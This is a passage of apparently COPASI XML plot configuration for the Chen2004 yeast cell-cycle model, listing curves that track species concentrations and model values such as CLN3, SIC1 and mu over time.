<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN2],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CLN3]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN3],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[ESP1]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[ESP1],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[F2]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[F2P]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2P],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[F5]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[F5P]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5P],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[IE]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[IE],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[IEP]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[IEP],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[LTE1]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[LTE1],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[MAD2]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MAD2],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[MASS]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MASS],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[MCM1]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MCM1],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[NET1]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[NET1],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[NET1P]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[NET1P],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[NET1T]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[NET1T],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[ORI]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[ORI],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[PDS1]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[PDS1],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[PE]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[PE],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[PPX]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[PPX],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[RENT]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[RENT],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[RENTP]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[RENTP],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[SBF]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SBF],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[SIC1]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[SIC1P]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1P],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[SIC1T]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1T],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[SPN]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SPN],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[SWI5]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SWI5],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[SWI5P]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SWI5P],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[TEM1GDP]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[TEM1GDP],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[TEM1GTP]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[TEM1GTP],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[mdt]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mdt],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[D]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[D],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[mu]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mu],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vdb5]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb5],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vdb2]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb2],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vasbf]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vasbf],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Visbf]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Visbf],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vkpc1]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpc1],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vkpf6]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpf6],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vacdh]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vacdh],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vicdh]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vicdh],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vppnet]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppnet],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vkpnet]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpnet],Reference=Value"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="Values[Vdppx]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdppx],Reference=Value"/>
